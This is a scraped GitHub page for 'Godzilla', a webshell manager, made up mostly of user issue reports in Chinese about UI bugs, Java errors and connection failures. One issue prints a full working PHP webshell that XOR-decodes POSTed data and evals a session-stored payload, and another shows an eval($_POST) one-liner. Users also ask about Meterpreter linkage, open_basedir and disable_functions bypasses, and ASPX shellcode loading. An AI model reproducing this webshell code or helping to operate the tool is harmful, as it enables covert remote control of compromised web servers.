beichendream / godzilla Goto Github PK

View Code? Open in Web Editor NEW

3.8K 3.8K 529.0 110 KB

哥斯拉

godzilla's People

Contributors

Stargazers

Watchers

Forkers

littlehann shimxx askyeye lhj108 freefv xizhimen haoirui nothingonyoumoon you920 gkfnf sexisnull amaake3321 steward007 k1ns0 sanchahua yangmingxu ckmount lakemoon602 27story lp008 test123test111 gmwshz omiter tdr130 underwood12 luciker blackstarkk pyking wbglil knightnetcn raystyle chaceshadow fbion te5t321 todolin loverone aqqdgyz 5icorgi whitesharks ztencmcp fengxl3320 invaderkk mrdoulestar i1ch jackhuyh fengzihk laowang1026 dahaiyidi myxss rebootorz muyuxx shad0w008 k-ring 0ps rassec zzhacked victor0013 sobinge qianniaoge lowliness9 gayhub-blackerie gdbingo nok8 hanklehigh allanp0e landixiansen keyman9848 secwsstest iiiusky silience vrirus ffpepwowa huakaii joner11234 larimda simplejoker aleffine truebasic2011 luohoufu crackercat kimifetch chivrs h1d3r nothingcw dictators titihu pumaxiaoyao a099 ilovecode2018 huangzccn ir-st thinks520 crazytear 4869aptx eaglerlight blockchainguard wj158 chigua365 nbsp-null hasee2018

godzilla's Issues

3.03 php马出来的是普通一句话？？

密码：pass
密钥：key
载荷：PhpDynamicPayload
加密：PHP_EVAL_XOR_BASE64

出来的是：
#######################<?php eval($_POST["pass"]);

运行后没有工具栏

java1.8和java16都试了，运行最新版Godzilla之后没有工具栏，只有我一个人有这种问题吗

关于生成的shell的encode函数和框架自带函数冲突问题

function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
定义了一个函数
和tp自带的冲突了

命令执行窗口，无法切换目录

博主您好，跟您反馈一个功能缺陷，哥斯拉的命令执行窗口，貌似不能切换目录，执行切换目录命令后，仍然返回默认目录

对比之下，蚁剑则可以正常处理

MacOS下的Bug

1、MacOS下添加shell默认窗口大小偏小，需要手动调整

2、MacOS下添加shell点击测试连接直接卡死，等待几分钟后出现报错信息，版本是最新的3.00

师傅你好，添加目标的窗口太小了不知道咋回事，之前v2的时候也是这样

路径中如果存在中文，文件管理那会出现乱码并且无法进入到文件夹中

aspx加载shellcodeloader

aspx加载shellcodeloader，加载shellcode得格式是c#得还是c/bin呢，我看源码里面是shellcodehex 把前面说的三个全部尝试hex编码了，并没有成功加载。

不支持的Java Ui 版本

启动程序后提示如上信息，本地系统安装的是openjdk-11-jdk和openjfx，程序是需要指定的哪款java ui库吗？

添加url报错

报错信息
initShellOperation Fail

密码，密钥，填写的url都是正确的，没有错误

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$payloadName='payload';
$key='202cb962ac59075b';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
		eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
?>

有几个功能不会使用

我太笨了，有几个功能不会使用，希望您能指点一下，谢谢您
1、PMeterpreter中怎么与msf进行联动
2、ByPassOpenBasedir这个功能怎么使用
3、代码执行和BypassDisableFunction提示PHP_Eval_Code no load是什么意思
谢谢您，辛苦了

Language voting

If the supported options are greater than the unsupported options, and the supported number is greater than 100, I will release i18n from Godzilla

Voting ends at 18:30 on 2020-11-20

Initialize Fail !

Nginx 1.20 + PHP 7.3.4

本地搭建起来生成php的3种payload都无法

添加proxy代理第二次请求无回显

哥斯拉有很多的问题

1.不支持反向代理连接navcat
2.数据库不能保存下来方便下次使用
3.笔记这个玩意儿能不能不进入shell也能看，shell掉了是不是看不了了
4.数据库不支持utf-8的中文输出，只要输出是中文就乱码需要gbk才行，可是这样我的sql语句写中文必定乱码
5.复制文件移动文件这些东西写的好鸡肋啊
6.容易假死，大文件假死？？？建议分线程搞这种事情？？？
阿西吧啊

t00ls专用版和普通版有啥区别？

大佬，t00ls专用版和普通版有啥区别？

Godzilla.jar
Godzilla-t00ls.jar

这俩打开看着是一样的？

[] Time:2020-10-19 21:13:08 ThreadId:1 Message: load pluginJar success! pluginJarNum:0 LoadPluginJarSuccessNum:0
[] Time:2020-10-19 21:13:08 ThreadId:1 Message: load payload success! payloadMaxNum:3 onceLoadPayloadNum:3
[] Time:2020-10-19 21:13:09 ThreadId:1 Message: load cryption success! cryptionMaxNum:6 onceLoadCryptionNum:6
[] Time:2020-10-19 21:13:09 ThreadId:1 Message: load plugin success! pluginMaxNum:20 onceLoadPluginNum:20
[!] Time:2020-10-19 21:13:09 ThreadId:1 Message:https://gitee.com/beichendram/Godzilla/raw/master/qqGroup.png stackTrace: java.base/sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1928)->java.base/sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1528)->java.base/sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:224)->util.functions.httpReqest(functions.java:265)->core.ApplicationConfig.invoke(ApplicationConfig.java:77)->core.ui.MainActivity.(MainActivity.java:60)->core.ui.MainActivity.main(MainActivity.java:277)
Exception in thread "main" java.lang.NullPointerException
at java.base/java.io.ByteArrayInputStream.(ByteArrayInputStream.java:108)
at core.ApplicationConfig.invoke(ApplicationConfig.java:77)
at core.ui.MainActivity.(MainActivity.java:60)
at core.ui.MainActivity.main(MainActivity.java:277)

3.03在mac上运行时，添加目标UI显示不完整 13.3英寸(2560 × 1600)

上一个关闭了重新提交一个
3.03在mac上运行时，添加目标UI显示不完整
13.3英寸(2560 × 1600)

上传exe文件失败

上传大一点的文件失败 >1M
其他shell管理软件脚本正常
jsp

为啥JSP和ASP都有AES版本，唯独PHP没有？

是不是作者想偷懒？哈哈

payload Initialize Fail !

ThreadId:22 Message: payload Initialize Fail !

是哪里出了问题？提示初始化失败。

无法直接把url粘贴到Godzilla的框中，每次都要手动输入

护网的时候放出来，不会是是社工吧

Godzilla-V2.92在win10上的UI兼容性有点问题

Godzilla-V2.92在win10上的UI兼容性有点问题，在新增里面的数据填写框没有显示完全

UI不全，可能是什么原因

[] Time:2021-05-07 16:47:14 ThreadId:1 Message: load pluginJar success! pluginJarNum:0 LoadPluginJarSuccessNum:0
[] Time:2021-05-07 16:47:14 ThreadId:1 Message: load payload success! payloadMaxNum:3 onceLoadPayloadNum:3
[] Time:2021-05-07 16:47:14 ThreadId:1 Message: load cryption success! cryptionMaxNum:8 onceLoadCryptionNum:8
[] Time:2021-05-07 16:47:15 ThreadId:1 Message: load plugin success! pluginMaxNum:22 onceLoadPluginNum:22
[!] Time:2021-05-07 16:47:19 ThreadId:1 Message: 效验Hash成功 Hash Url:https://gitee.com/beichendram/Godzilla/raw/master/hashsumJar
效验Jar哈希:e50ef51aa1714b9ccfe6d733714317e1d7adb37de264eae990d69394fb71367d28601c99cd1358fa5ab44a26a171f21203b932ad6ef11b104dbeac99bd1be96b
本地Jar哈希:e50ef51aa1714b9ccfe6d733714317e1d7adb37de264eae990d69394fb71367d28601c99cd1358fa5ab44a26a171f21203b932ad6ef11b104dbeac99bd1be96b
java.lang.reflect.InaccessibleObjectException: Unable to make field protected java.util.Vector javax.swing.table.DefaultTableModel.columnIdentifiers accessible: module java.desktop does not "opens javax.swing.table" to unnamed module @654b5005
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:357)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:177)
at java.base/java.lang.reflect.Field.setAccessible(Field.java:171)
at core.ui.component.DataView.getColumnVector(DataView.java:148)
at core.ui.component.DataView.AddRows(DataView.java:226)
at core.ui.MainActivity.initVariable(MainActivity.java:97)
at core.ui.MainActivity.(MainActivity.java:85)
at core.ui.MainActivity.main(MainActivity.java:383)

主界面如下图：

中文乱码，建议添加文件上传进度功能

shell访问中文文件夹乱码，建议上传文件加一个上传进度，大文件上传会容易没反应

插件从哪里下载啊

没有插件下载位置啊。

下载文件处未判断窗口状态

下载文件无论点击保存还是取消都会覆盖本地文件
建议加个判断

    private void downloadFile() {
        //code
        int result = chooser.showDialog(new JLabel(), "选择");
        File selectdFile = chooser.getSelectedFile();
        if (result == JFileChooser.APPROVE_OPTION) {

Oracle数据库连接的时候，执行语句提示“ORA-0091：无效字符”

连接Oracle后随便执行一个默认的语句，提示这个无效字符，后面在作者的指导下发现是因为带了后面的分号";",把结尾的分号去掉就可以了，因此执行语句的时候都要去掉分号就可以正常显示数据了。
非常感谢Beichen师傅开发的这款工具，辛苦啦！！！

求 Mac 版

Mac m1 air 报错

└─$ java -jar Godzilla-V2.96.jar 
[!] Time:2021-02-22 12:33:45 ThreadId:1 Message: 不支持的Java Ui 版本 
[!] Time:2021-02-22 12:33:45 ThreadId:1 Message:Error opening connection stackTrace: org.sqlite.SQLiteConnection.open(SQLiteConnection.java:239)->org.sqlite.SQLiteConnection.<init>(SQLiteConnection.java:61)->org.sqlite.jdbc3.JDBC3Connection.<init>(JDBC3Connection.java:28)->org.sqlite.jdbc4.JDBC4Connection.<init>(JDBC4Connection.java:21)->org.sqlite.JDBC.createConnection(JDBC.java:115)->org.sqlite.JDBC.connect(JDBC.java:90)->java.sql/java.sql.DriverManager.getConnection(DriverManager.java:677)->java.sql/java.sql.DriverManager.getConnection(DriverManager.java:251)->core.Db.<clinit>(Db.java:30)->core.ApplicationContext.initFont(ApplicationContext.java:75)->core.ApplicationContext.init(ApplicationContext.java:65)->core.ui.MainActivity.<init>(MainActivity.java:65)->core.ui.MainActivity.main(MainActivity.java:303)
[!] Time:2021-02-22 12:33:45 ThreadId:1 Message:Cannot invoke "java.sql.PreparedStatement.setString(int, String)" because "preparedStatement" is null stackTrace: core.Db.getSetingValue(Db.java:337)->core.ApplicationContext.initFont(ApplicationContext.java:75)->core.ApplicationContext.init(ApplicationContext.java:65)->core.ui.MainActivity.<init>(MainActivity.java:65)->core.ui.MainActivity.main(MainActivity.java:303)
[!] Time:2021-02-22 12:33:45 ThreadId:1 Message:Cannot invoke "java.sql.PreparedStatement.setString(int, String)" because "preparedStatement" is null stackTrace: core.Db.getSetingValue(Db.java:337)->core.ApplicationContext.initFont(ApplicationContext.java:76)->core.ApplicationContext.init(ApplicationContext.java:65)->core.ui.MainActivity.<init>(MainActivity.java:65)->core.ui.MainActivity.main(MainActivity.java:303)
[!] Time:2021-02-22 12:33:45 ThreadId:1 Message:Cannot invoke "java.sql.PreparedStatement.setString(int, String)" because "preparedStatement" is null stackTrace: core.Db.getSetingValue(Db.java:337)->core.ApplicationContext.initFont(ApplicationContext.java:77)->core.ApplicationContext.init(ApplicationContext.java:65)->core.ui.MainActivity.<init>(MainActivity.java:65)->core.ui.MainActivity.main(MainActivity.java:303)
[!] Time:2021-02-22 12:33:45 ThreadId:1 Message:Cannot invoke "java.sql.PreparedStatement.setString(int, String)" because "preparedStatement" is null stackTrace: core.Db.getSetingValue(Db.java:337)->core.ApplicationContext.getGloballHttpHeader(ApplicationContext.java:366)->core.ApplicationContext.initHttpHeader(ApplicationContext.java:84)->core.ApplicationContext.init(ApplicationContext.java:66)->core.ui.MainActivity.<init>(MainActivity.java:65)->core.ui.MainActivity.main(MainActivity.java:303)
[!] Time:2021-02-22 12:33:45 ThreadId:1 Message:Cannot invoke "java.sql.Statement.executeQuery(String)" because "statement" is null stackTrace: core.Db.getAllPlugin(Db.java:246)->core.ApplicationContext.scanPluginJar(ApplicationContext.java:132)->core.ApplicationContext.init(ApplicationContext.java:67)->core.ui.MainActivity.<init>(MainActivity.java:65)->core.ui.MainActivity.main(MainActivity.java:303)
[*] Time:2021-02-22 12:33:45 ThreadId:1 Message: load pluginJar success! pluginJarNum:0 LoadPluginJarSuccessNum:0
[*] Time:2021-02-22 12:33:45 ThreadId:1 Message: load payload success! payloadMaxNum:3 onceLoadPayloadNum:3
[*] Time:2021-02-22 12:33:45 ThreadId:1 Message: load cryption success! cryptionMaxNum:6 onceLoadCryptionNum:6
[*] Time:2021-02-22 12:33:45 ThreadId:1 Message: load plugin success! pluginMaxNum:21 onceLoadPluginNum:21
[!] Time:2021-02-22 12:33:46 ThreadId:1 Message: 效验Hash成功   Hash Url:https://gitee.com/beichendram/Godzilla/raw/master/hashsumJar
效验Jar哈希:6053116ca6ae76d6abd0b6b2a4f13a20674f71824315e14b48bd3df28ef280d602ba3758daadd5c6252df35f291baa226aac5e0cebfb4d371e850876228832ad
本地Jar哈希:6053116ca6ae76d6abd0b6b2a4f13a20674f71824315e14b48bd3df28ef280d602ba3758daadd5c6252df35f291baa226aac5e0cebfb4d371e850876228832ad 
[!] Time:2021-02-22 12:33:46 ThreadId:1 Message:Cannot invoke "java.sql.PreparedStatement.setString(int, String)" because "preparedStatement" is null stackTrace: core.Db.getSetingValue(Db.java:337)->core.ui.MainActivity.<init>(MainActivity.java:68)->core.ui.MainActivity.main(MainActivity.java:303)
[!] Time:2021-02-22 12:33:46 ThreadId:1 Message:Cannot invoke "java.sql.Statement.executeQuery(String)" because "statement" is null stackTrace: core.Db.getAllShell(Db.java:78)->core.ui.MainActivity.initVariable(MainActivity.java:86)->core.ui.MainActivity.<init>(MainActivity.java:77)->core.ui.MainActivity.main(MainActivity.java:303)
Exception in thread "main" java.lang.NullPointerException: Cannot invoke "java.util.Vector.get(int)" because "rows" is null
	at core.ui.MainActivity.initVariable(MainActivity.java:87)
	at core.ui.MainActivity.<init>(MainActivity.java:77)
	at core.ui.MainActivity.main(MainActivity.java:303)